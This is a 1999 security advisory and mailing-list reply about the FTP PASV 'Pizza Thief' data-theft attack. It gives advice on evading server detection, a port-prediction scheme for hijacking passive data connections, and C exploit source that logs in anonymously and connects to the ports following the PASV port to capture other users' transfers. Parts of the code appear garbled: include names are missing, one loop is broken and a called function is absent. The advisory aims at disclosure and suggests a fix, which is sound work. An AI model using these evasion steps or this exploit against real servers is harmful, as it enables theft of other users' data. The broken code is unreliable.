InfoWar Security Advisory #02 Advanced Methods of the Pizza Thief Exploit
     
     * Please note comments regarding Infowar Security Advisory #1 at the bottom of this post.*
     
     Advanced Methods of the Pizza Thief Exploit
     Author: Jeffrey R. Gerber
     Date: February 7th, 1999
     
     BLENDING IN WITH THE CROWD
     
     PASV commands without connections:
     
     A pizza thief program is subject to detection if the program is written such that PASV commands
     are executed without ever establishing a connection to the associated passively allocated port.
     All that an FTP server would need to do in detection is log the associated network address of any
     executions of PASV not followed by a connection. Skirting this problem for the pizza thief is as
     simple as completing the connection.
     
     PASV commands with connections but no data:
     
     A second scenario that is detectable by an FTP server is a PASV command followed by a connection
     to the associated passively allocated port with no data transmission through the port. Again, the
     pizza thief may skirt this detection problem by simply issuing a data transmission command such
     as LIST.
     
     DETERMINING SITE SUCCEPTABILITY
     
     On some FTP servers, such as Microsoft's, a SITE statistics feature is enabled, allowing an
     attacker to assess at with what level of frequency the PASV state is used on the server. After a
     successful login to a Microsoft FTP server (USER and PASS commands) the "SITE STATS" command may
     be issued. Both PORT and PASV usage are shown from which the percent usage of PASV may be
     derived.
     
     ATTACKING SITES WHERE NO ANONYMOUS ACCOUNT EXISTS
     
     Flawed FTP servers:
     
     Some FTP servers allow a PASV command to be executed before any login authentication occurs. On
     servers tested with this flaw, data transmission on the illegitimate PASV port is not possible.
     However, the necessary port information is already gained.
     
     Obtaining predictable ports from other sources:
     
     If the identification service "ident" is used on the FTP server machine, it may be possible to
     also use ident responses to predict FTP ports. The methodologies for doing this will not be
     discussed here but it is worthy of mention.
     
     Random port prediction:
     
     Finding an FTP PASV allocated port without control connection capability is perhaps the most
     difficult method for executing the pizza thief exploit. Designing a random port prediction system
     must be done with three states of operation. In the first state an "anchor port" is found. The
     pizza thief program must establish an even distribution of ports through the entire allocatable
     port range. This distribution is a static set of ports. Repeated parallel attempts at connection
     to this array of ports will occur until one of the ports is successful in connection. At this
     point an "anchor port" has been established and a second state of operation is entered. In the
     second state of operation, a contiguous set of ports following the anchor port are used to
     establish a second data point, which is then used to start prediction in an average upward port
     motion. Upon connection to a second port, the third state of operation is entered. In the third
     state of operation "port tolerance" is used to hold the port prediction flow. "Port tolerance" is
     the opening of ports to either side of the predicted port. Should the port that opens be to one
     side or the other of center, the center is shifted in the next port prediction to maintain the
     balance in prediction.
     
     +++++++++++++++++++++++++++++++++++++++++++++++++
     
     Re: [NTSEC] New Exploit - FTP PASV "Pizza Thief" Exploit
     ---Bret McDanel  wrote:
     
     Reply on mail from loose goose about [NTSEC] New Exploit - FTP PASV "Pizza Thief" Exploit
     
     InfoWar Security Advisory #01
     (http://www.infowar.com)
     February 1st, 1999
     FTP PASV "Pizza Thief" Exploit
     Author: Jeffrey R. Gerber
     
     Well the exploit itself wasnt here, dunno if one is floating around, but I whipped one up and
     here it is.. It works for me, it should for you, but I make no guarantees :)
     
     The program will connect to an ftp server, log in as user 'ftp' and if that works, issue a PASV
     command. This enables it to figure out what the next port is. It then connects to the next X
     number of ports, and when it gets data, dumps it to the screen, it then exits..
     
     This isnt the best program in the world, nor was it meant to be, it was meant to prove that a
     hole exists, which may cause people to fix it faster..
     
     I have only tested this from a solaris box, to compile on solaris:
     cc -lnsl -lsocket -o pizza pizza.c
     
     This should work from other OS's
     
     In the past, the PASV connection method was used with far less frequency than the preferred PORT
     connection method. The use of PASV has been increasing proportionately with an increased
     frequency of clients sitting behind firewalls (gated communities). The pizza thief attack thus
     becomes more effective by day. Not to mention Netscape/Explorer that only use PASV mode..
     
  /* PizzaThief Exploit written by Bret McDanel bret@rehost.com
  *
  * HISTORY:
  *    This program is based on the paper written by Jeffrey R. Gerber
  *    and released in InfoWar Security Advisory #01 (http://www.infowar.com)
  *    February 1st, 1999 titled 'FTP PASV "Pizza Thief" Exploit'
  *    Feburary 03 1999 - Wrote and released progam
  *
  * SUMMARY:
  *    Basically this program will attempt to connect to a FTP server,
  *    issue the PASV command to get the next assigned port and will
  *    assume that the kernel will issue ports sequentially (which most do)
  *    It will then try to connect to the next NUMSOCK ports (defined below)
  *    When it gets a connection, it will exit proving the hole exists.
  *
  * FIX:
  *    One possible fix would be to check the IP of the machine trying
  *    to connect to the DATA port to be the same one that requested it.
  *    This will limit exposure (but not prevent it, as anyone else on that
  *    same machine could 'steal' data this way but it would be better than
  *    not checking at all.  Other fixes can be found in Jeffrey R. Gerber's
  *    paper (url listed above)
  *
  */

 #include 
 #include 
 #include 
 #include 
 #include 

 #define NUMSOCK 50


 connserver(host,port)
 char *host;
 int port;
 {
   int sd,addr;
   struct hostent *he;
   struct sockaddr_in sa;

   /* try to resolve the host */
   if((addr=inet_addr(host))!= -1) {/* dotted decimal */
     memcpy(&sa.sin_addr,(char *)&addr,sizeof(addr));
   } else {
     if((he=gethostbyname(host))==NULL) {
       printf("Unable to resolve %s\n",host);
       return(-1);
   }
     memcpy(&sa.sin_addr,he->h_addr,he->h_length);
   }

  sa.sin_port=htons(port);
  sa.sin_family=AF_INET;

if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
     perror("socket");
     return(-1);
  }

   if(connect(sd,(struct sockaddr *)&sa,sizeof(sa))<0) {
     perror("connect");
     return(-1);
   }
   return(sd);
 }





 netgets(buff,len,sd)
 char *buff;
 int len,sd;
 {
   int i;

   memset(buff,0,len);
   for(i=0;i0) {
     if(i>0) printf("%s",buff);
     }
     return(0);
     } else {
    close(sd);
     }
     }
     }
     }
 main(argc,argv)
 int argc;
 char **argv;
 {
 int sd,ip;
 char buff[1024],*ptr1,*ptr2;
 unsigned short int port;
 if(argc!=2) {
 printf("Usage: %s ftpserver\n",argv[0]);
 exit(0);
 }
if((sd=connserver(argv[1],21))<0) exit(0);
while(1) {
if(netgets(buff,sizeof(buff),sd)==0) { /*
server closed connection */
close(sd);
exit(0);
}
if(!strncmp(buff,"220 ",4)) { /* requesting
username */
sprintf(buff,"user ftp\n");
send(sd,buff,strlen(buff),0);
}
if(!strncmp(buff,"331 ",4)) { /* requesting password */
sprintf(buff,"pass pizzaman@illuminati.gov\n");
send(sd,buff,strlen(buff),0);
 }
 if(!strncmp(buff,"230 ",4)) { /* we are logged in now */
sprintf(buff,"pasv\n");
send(sd,buff,strlen(buff),0);
 }
if(!strncmp(buff,"530 ",4)) { /* invalid password */
sprintf(buff,"quit\n");
send(sd,buff,strlen(buff),0);
close(sd);
printf("User ftp wasnt allowed\n");
exit(0);
}
if(!strncmp(buff,"227 ",4)) { /* PASV responce */
/* first get the ip/port into the buffer */
ptr1=strtok(buff,"(");
ptr2=strtok((char *)NULL,")");
/* now break off the IP part */
ptr1=(char *)&ip;
ptr1[0]=atoi(strtok(ptr2,","));
ptr1[1]=atoi(strtok((char *)NULL,","));
ptr1[2]=atoi(strtok((char *)NULL,","));
ptr1[3]=atoi(strtok((char *)NULL,","));
/* now get the port number */
ptr1=(char *)&port;
ptr1[0]=atoi(strtok((char *)NULL,","));
ptr1[1]=atoi(strtok((char *)NULL,","));
sprintf(buff,"quit\n");
send(sd,buff,strlen(buff),0);
pizzaman(ip,port);
 }
 }
 }